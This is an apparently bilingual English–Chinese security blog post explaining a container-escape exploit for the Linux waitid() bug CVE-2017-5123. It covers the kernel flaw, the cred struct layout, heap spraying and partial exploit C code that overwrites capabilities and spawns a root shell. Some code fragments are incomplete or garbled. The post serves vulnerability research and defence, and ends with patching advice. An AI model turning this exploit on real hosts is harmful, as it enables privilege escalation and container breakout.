The post describes how I exploited the waitid() vulnerability in order to modify the Linux capabilities of a Docker container to gain elevated privileges, and ultimately escape the container jail. If you wnat to see how Twistlock would stop this vulnerability in its tracks, check out my follow up blog.

這篇文章描述我如何利用 waitid() 修改 Docker 容器的 Linux capabilities 從而取得更高的權限,最後逃離了容器監獄。如果你想要看看 Twistlock 如何在他的軌跡中阻止這個弱點,在這篇文章有。

But before we dive in, since an image is worth a thousand words, here is my exploit in action. It modifies the containerized process capabilities structure in memory, resulting in a gain of CAP_SYS_ADMIN and CAP_NET_ADMIN capabilities. This results in the ability to enable promiscuous mode on eth0(docker bridge for the container):

但在我們深入之前,一張圖勝過千言萬語,這是我的利用過程。它修改容器化行程在記憶體中的 capabilities 結構,導致取得 CAP_SYS_ADMINCAP_NET_ADMIN capabilities。這意味著有能力開啟 eth0(容器的 docker bridge) 的混沌模式

Youtube 影片

Note that I have turn off Kernel ASLR for the recording, but it also works with KASLR as we can find the kernel base and the heap base by using the same vulnerability.

請留意我在影片中已經關掉 Kernel ASLR,但在 KASLR 的狀態下依然可以藉由同一個弱點成功找到核心基址與堆積基址。

CVE-2017-5123 was published earlier this year on Oct 12 - it was a Linux kernel vulnerability in the waitid() syscall for 4.12-4.13 kernel versions. The waitid() syscall defined as:

CVE-2017-5123 是今年 8 月 12 日發布 - 它是一個在 waitid() 系統呼叫的 Linux 核心 4.12-4.13 版本弱點。waitid() 系統呼叫定義為:

int waitid(idtype_t idtype, it_t id, siginfo_t *infop, int options);

The vulnerability allows an attacker to write a partially-controlled data to kernel memory address of his choice. The kernel memory address can be provided as theinfoppointer above. The pointer points to a struct siginfo described below. In this struct we can control sveral variables, specifically pid and status.


As you can see below, the control is rather indirect.


struct siginfo {
    int si_signo;
    int si_errno;
    int si_code;
    int padding; // this remains unchaged by waitid
    int pid;     // process id
    int uid;     // user id
    int status;  // return code

Most of the values cannot be controlled by us or are limited in their size for our needs, however we can control the pid value by creating a lot of processes with the help of fork() or clone() until we hit the desired pid value. Still, we are limited by the PID_MAX value of the system, which is by default configured to be 32768 which equals to 0x8000 in hex.

多數的數值無法被我們控制,或是對我們來說在大小方面有所限制,然而我們可以藉由fork()clone()的幫助創造很多行程,來控制 pid的值,直到我們觸碰到想要的pid為止。但我們仍受限於系統中PID_MAX的值,預設為 32768 等於 十六進位 0x8000

Note: In a non-containerized environment we could elevate this number after changing our uid to 0 and gain root privileges, as we could modify /proc/sys/kernel/pid_mx to any number.

註:在一個非容器的環境,我們可以在將 uid 設為0後提高這個數字,並取得 root 權限,如同我們可以修改 /proc/sys/kernel/pid_max 為任何數字。

Linux Capabilities

In this section I’ll focus on a short overview of Linux capabilities - what they are, how Docker uses them, and how they are represented in the memory.

在這個章節我將專注在簡短概觀的 Linux capabilities - 它們是什麼,與Docker 如何使用它們,與它們在記憶體中如何被表示。

The code snippet below is taken from linux/cred.h and is the definition of the credentails struct that each process has:

下方是從 linux/cred.h 擷取的程式碼片段 ,為每個行程的認證資訊結構:

struct cred {
    atomic_t usage;
    atomic_t subscribers; /* number of processes subscribed */
    void *put_addr;
    unsigned magic;
#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
    kuid_t uid; /* real UID of the task */
    kgid_t gid; /* real GID of the task */
    kuid_t suid; /* saved UID of the task */
    kgid_t sgid; /* saved GID of the task */
    kgid_t euid; /* effective UID of the task */
    kuid_t egid; /* effective GID of the task */
    kuid_t fsuid; /* UID for VFS ops */
    kgid_t fsgid /* GID for VFS ops */
    Unsigned securebits; /* SUID-less security management */
    Kernel_cap_t cap_inheritable; /* caps our children can inherit */
    Kernel_cap_t cap_permitted; /* caps we're permitted */
    Kernel_cap_t cap_effective; /* caps we can actually use */
    Kernel_cap_t cap_ambient; /* Ambient capability set */

man capabilities:

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuse into distinc units, known as capabilities, which can be independently enabled and disabled. Capabilities are a per-thread attribute.

從核心 2.2開始,Linux 將傳統與超級使用者相關聯的權限分成不同的單元,可被個別啟用及停用,並稱之為 capabilities。每個執行緒都會有各自的 Capabilities 屬性。

Linux capabilities are stored inside each process’s own cred struct and represented by a bitmask. For example all caps enabled would be represented by a bitmask of 0xFFFFFFFFFFFFFFFF .

Linux capabilities 被儲存在每個行程自己的 cred struct 並使用 bitmask 來表示。例如所有的 caps 都被啟用的話,則用 bitmask 表示成 0xFFFFFFFFFFFFFFFF

Each capability provides a different set of permissions, for instance:

每個 capability 提供一個不同的權限分配,舉例來說:

CAP_SYS_MODULE - allows for loading & unloading kernel modules.

CAP_NET_ADMIN - allows for various network operations. For example entering promiscuous mode, interface configuration and more.

CAP_SYS_ADMIN - enables a range of system administration operations such as quotactl, mount, umount, swapon, setdomainname, ptrace and much more(this cap gives the most privileges and overloads others).

CAP_SYS_MODULE - 允許載入或卸載核心模組。

CAP_NET_ADMIN - 允許數種網路操作,例如開啟混沌模式,介面設定等等。

CAP_SYS_ADMIN - 啟用一個範圍內的系統管理操作,如 quotactl, mount, umount, swapon, setdomainname, ptrace 等等(這個 cap 給了最多權限並會多載其他的 cap)。 (編按:這個權限在 Linux manual 中建議最好避免使用,畢竟會賦予非常多的權限,幾乎可以說是一個另類的 root,除非須需求幾乎等同於此 cap,否則建議能避則避。)

You can find the full list of CAPS over here.

你可以在這裡找到完整的 CAPS 清單。

Docker uses capabilites to provide a better isolation for containers. It simply drops capabilities that would enable container escape. For example, you will rarely see a container that is running out-of-the-box with any of the 3 capabilities above, as it would be security concern if a container could access the network interface and sniff the traffic of other containers or the host itself, or if a user inside the container could mount directories on the host and load kenrel modules.

Docker 使用 capabilities 來為容器提供一個較好的隔離環境。Docker 純粹的將可能造成脫離容器的 capabilities 拿掉。例如,你會幾乎看不到一個容器運行在限制之外,有著上述三個 capabilities 的任何一個,當一個容器可以存取網路介面並嗅探其他容器或是主機的流量,或是一個在容器中的使用者可以在主機上掛上目錄並且載入核心模組,這些都是有安全疑慮的。

Although it might be easier to build a ROP chain and call commit_creds(0) in order to gain root with full capabilities, in order to learn more about heap spraying, I decided to go with the blind exploitation method by spraying the kernel heap with thousands of struct creds like Federico did. The downside of the this exploit is that full caps are impossible to reach as we are not in control of what we are writing(we are limited to 0x8000) and the value of 0xFFFFFFFFFFFFFFFF is out of reach for us.

雖然造一個 ROP鏈來呼叫 commit_creds(0) 以獲得 root 權限與全部的 capabilities 似乎來的更簡單一點,但為了學到更多與堆積噴灑相關的技巧,並且在不知道目標環境下的漏洞利用方法,就像 Federico 做的一樣,將數千個 creds 結構噴好噴滿到核心堆積中。這個漏洞利用的缺點就是無法取得全部的 caps,因為我們無法控制寫入的東西(我們受限於 0x8000 的限制) 而且 0xFFFFFFFFFFFFFFFF 對我們來說是不可能達到的。

The vulnerability / 弱點成因

The code snippet below is taken from kernel/exit.c and is in charnge of handling the waitid() syscall:

這是從 kernel/exit.c 取得的程式碼片段,負責處理系統 呼叫 waitid():

SYSCALL_DEFINE5(waitid, int, which , pid_t, upid, struct siginfo __user *, infop, int, options, struct rusage __user *, ru)
    struct rusage r;
    struct waitid_info info = {.status = 0};
    long err = kernel_waitid(which, upid, &info, options, ru ? &r : NULL);
    int signo = 0;
    if (err > 0) {
        signo = SIGCHLD;
        err = 0;
        if (ru && copy_to_user(ru, &r, sizeof(sturct rusage)))
        return -EFAULT;
    if (!infop)
        return err;
    if (!/*醒目*/access_ok/*提示*/(VERIFY_WRITE, infop, sizeof(*infop)))
        return -EFAULT; 
    unsafe_put_user(signo, &infop->si_signo, Efault);
    unsafe_put_user(0, &infop->si_errno, Efault);
    unsafe_put_user(info.cause, &infop->si_code, Efault);
    unsafe_put_user(, &infop->si_pid, Efault);
    unsafe_put_user(info.uid, &infop->si_uid, Efault);
    unsafe_put_user(info.status, &infop-si_status, Efault);
    return err;
    return -EFAULT;

The vulnerability is that the highlighted access_ok() check, which ensures that the user specified pointer is in face a user-space pointer, was missing in the waitid() syscall. Without this check a user can supply a kernel address pointer and the syscall will write to it without objections when executing unsafe_put_user.

弱點在於有醒目提示的 access_ok() 檢查,用來保證使用者指定的指標是屬於使用者空間的指標,在 waitid() 系統呼叫中少了這個檢查,缺了這個檢查,使用者可以提供一個核心地址指標,當執行 unsafe_put_user 時系統呼叫會毫無異議的寫入該位址。

As we already know - we can’t simply write whatever we want, but we will have to try to gain as much as we can within these limitations.

如同我們已經知道的 - 我們不能任意的想寫入哪裡就寫入哪裡,但我們必須在這些限制之下,竭盡我們所能的嘗試獲取可寫位址。

Info.status is a 32bit int, but the value of status is constrained to 0 < status < 256 as we can ses in the exit codes documentation, and as we already knowpidis constrained byMAX_PID

Info.status是一個 32bit 整數,但狀態的值被約束在 0 與 256 之間,就像我們在 exit 程式碼文件看到的,同時我們也知道pidMAX_PID約束了。

At this point we have the ability to write a value of pid: 0 < pid < 0x8000 to anywhere we want. The next challenge is to detect where we should write in order to successfully overwirte the desired values.

目前我們有寫入 pid 值得能力: 介於 0 到 0x8000,到任意我們想要的地方,下一個挑戰是偵測到我們該寫到的位置,才能成功的覆寫想要的值。

We need to rememer that the syscall will actually write 6 different fields each time we execute it, as there will be 6 executions of unsafe_put_user()

我們需要記得,系統呼叫在每次執行的時候,實際上會寫入 6 個不同欄位,因為有 6 個 unsafe_put_user() 被執行了。

So we will need to take into account the offset of pid inside the infop sturct and use it to subtract that value from the target address into waitid() syscall as the infop pointer.

所以我們需要帶入 infop 結構中 pid 的帳戶偏移值,並使用它減去到 waitid() 呼叫的目標位址的值作為 infop 指標。

Our main goal with this exploit is to overwrite the capabilities that Docker sets for us, thus gaining additional privileges and to escape the container.

我們使用這個漏洞利用的主要目標是,覆寫 Docker 為我們設定的 capabilities,就可以獲得額外的權限並且逃離容器。

Spray n’ Pray / 噴灑並禱告

I decided to take an approach similar to Federico, so I proceeded to spray the kernel heap with thousands of struct creds and then start guessing by writing to various addresses and pray to hit my target.

我決定使用與 Federico 相似的方法,所以我用數千個 creds 結構將核心堆積噴好噴滿,然後開始透過寫入不同位址來猜測,禱告並祈求可以擊中我的目標。

By picking a value that we can track such as uid (which we can track with getuid()).

藉著選一個我們可以追蹤的值如 uid (我們可以使用 getuid() 來追蹤)。

We can, with a little bit a luck, pinpoint our struct cred location, after which we will be able to write to specific offsets in order to overwrite the capabilities,gid,euid and anything else we want.

幸運的話,我們可以做到的,指向我們的 struct cred 位置,之後我們將能寫到指定的偏移,就可以覆寫 capabilities, gid, euid 與其他任何我們想要的東西。

But in order to do that we need to figure out the actual offsets, which we will do with the help of gdb:

但為了要實現,我們需要搞清楚真實的偏移值,我們將依靠 gdb 的幫助來實現:

As we can see, kuid_t is 4 bytes in size, as such if we found uid on 0xFFFF880023cc1004 than gid will be at 0xFFFF880023cc1008, 4 bytes above, and euid will be at 0xFFFF880023CC1014 which is 4*0x4=0x10 bytes above our uid address as illustrated in the diagram below.

猶如我們看到的, kuid_t 是 4 個位元組的大小,因為醬子,如果我們在 0xFFFF880023cc1004 發現 uid ,那麼 gid 會在 0xFFFF880023cc1008, 4 個位元組之上,而 euid 會在 0xFFFF880023CC1014,就是 4*0x4=0x10(編按: 0x開頭是16進位,並非0乘4) 位元組之上,我們的 uid 位址,如下圖所示。

So essentially in order to overwite our caps will have to write to:

所以重要的是為了覆寫我們的 caps 將必須寫到:

address_of_uid+0x4*8 = address_of_uid+0x20 = address_of_cap_inferitable

Note: These addresses are relevant to my system, your addresses might differ.

註: 這些位址跟我的系統有相關聯,你的位址可能會不一樣。

In order to find out where our sprayed cred structs might land in the heap we will use gdb again and set a breakpoint on sys_getuid in order to break when our program calls getuid().

為了找到我們噴灑的 cred structs 在堆積中可能的落點,我們將再次使用 gdb 並設置一個中斷點在 sys_getuid 上,以便在程式呼叫 getuid() 的時候中斷下來。

A few step commands after the breakpoint (it took 5 on my system) should reveal the cred struct address in the RAX register.

斷下來後,步進幾個指令(在我的系統上是 5 個)應該會在 RAX 暫存器中顯示 cred struct 的位址。

We can repeat that process of finding the struct for a number of forks in order to collect enough addresses and analyze the statistics of where the struct cred is most likely to be in the heap

我們可以重複這個找結構的過程,藉由數個分叉(fork)以便收集足夠的位址並分析統計 struct cred 在堆積中最有可能的所在。

So the plan is as follows:


  1. Spawn thousands of processes by calling fork() in order to create thousands of cred structs in the kernel heap and make each of the processes constantly check if its UID==0 by calling getuid()
  2. Start writing the value 0 to addresses to which the struct cred->uid might land
  3. If and when one of our forked processes gets uid==0, it means that we have successfully overwritten the uid value with our guesses from step 2. Now we can overwrite the rest of the cred struct and change caps by writing to the offsets that we determined.
  1. 為了在核心堆積中創造數千個 cred structs 需要透過呼叫 fork() 產生數千個行程,並且呼叫 getuid() 使每個行程都不斷地檢查它自己的 UID 是否為 0
  2. 開始將 0 寫入位 struct cred->uid 可能的落點位址中
  3. 當其中一個我們分叉(fork)出來的行程獲得 uid 為 0,就代表我們已經成功從第二步猜測到並覆寫了uid的值。現在我們可以覆寫 cred struct 其餘的部分並藉由覆寫我們計算的值來修改 caps。

Our dirty exploit will be something to the effect of:


void writecaps(char *addr,unsigned long value){
while(1) {
      int pid = clone(exit_func, &amp;new_stack[5000], CLONE_VM | SIGCHLD, NULL);
      if (!pid) {
      if (pid == value) {
        syscall(SYS_waitid, P_PID, pid, addr, WEXITED, NULL);

void spraynpray(){
pid_t pid;
FILE *f;
char *argv[] = {"/bin/sh", NULL};
for (int i=0;i<5000;i++)
    pid = fork();
    if (pid==0)
    { // child process
  while (1) {
    if (*glob_var==1) {
      syscall(SYS_exit, 0);
    if (getuid() == 0){
    printf("[+] Got UID: 0 !\n");
     *glob_var = 1;
     writecaps((char *)finalcapsaddress,value);
    printf("Done, spawning a shell \n");
    execve("/bin/sh", argv, NULL);

    else if(pid<0)
        printf("failed to fork");

    else // parent process


void swapuid(){

    char* i,p;
    for(i = (char *)0xffff8800321b4004; ; i+=0xc0)
        printf("trying %p\n",i);
        syscall(__NR_waitid, P_PID, 0,(siginfo_t *)i, WEXITED, NULL);
munmap(glob_var, sizeof *glob_var);
printf("Found uid on %p\n",i-0xc0);

int main(void)
    glob_var = mmap(NULL, sizeof *glob_var, PROT_READ | PROT_WRITE,
                    MAP_SHARED | MAP_ANONYMOUS, -1, 0);

    *glob_var = 0;

unsigned long* base = findbase();

After analyzing my system (Ubuntu 17.10,Kernel 4.13.0-15, arch x86-64), I found a couple of areas where it seemed that cred struct is more likely to land in about 70% of the executions, but there is still a risk of crashing the machine because we may overwrite something important in the kernel.

在分析我的系統資後 (Ubuntu 17.10, 核心 4.13.0-15, 架構 x86-64),我發現數個區域貌似是運行時 creds 結構有 70% 以上的落點,但那仍然有使機器掛掉的風險存在,因為我們可能會覆寫到核心中重要的東西。

Conclusion / 結論

In 2017 alone, 434 linux kernel exploits where found, and as you have seen in this post, kernel exploits can be devastating for containerized environments. This is because containers share the same kernel as the host, thus trusting the built-in protection mechanisms alone isn’t sufficient. Make sure your kernel is always updated on all of your production hosts.

光是 2017 年就已經有 434 個 Linux 核心漏洞利用被發現,如同你在這篇文章中看到的一樣,核心漏洞利用對容器環境來說是具毀滅性的。這是因為容器與主機分享核心,因此光是信任內建的保護機制並不足夠。確保你的核心在所有的產品主機都總是最新的。

Thank you for reading and don’t forget to follow us @TwistlockLabs.

謝謝你的閱讀,別忘了在 @TwistlockLabs 跟隨我們。

Big credits to Federico Bento for pointing some things out and to Chris Salls for his Chrome sandbox escape exploit; my exploitation is heavily based on their work.

給點清了某些事情的Federico Bento一個大大的讚, Chris Salls也是,感謝他的 Chrome 沙盒逃脫漏洞利用; 我的漏洞利用大多數是基於他們的成果。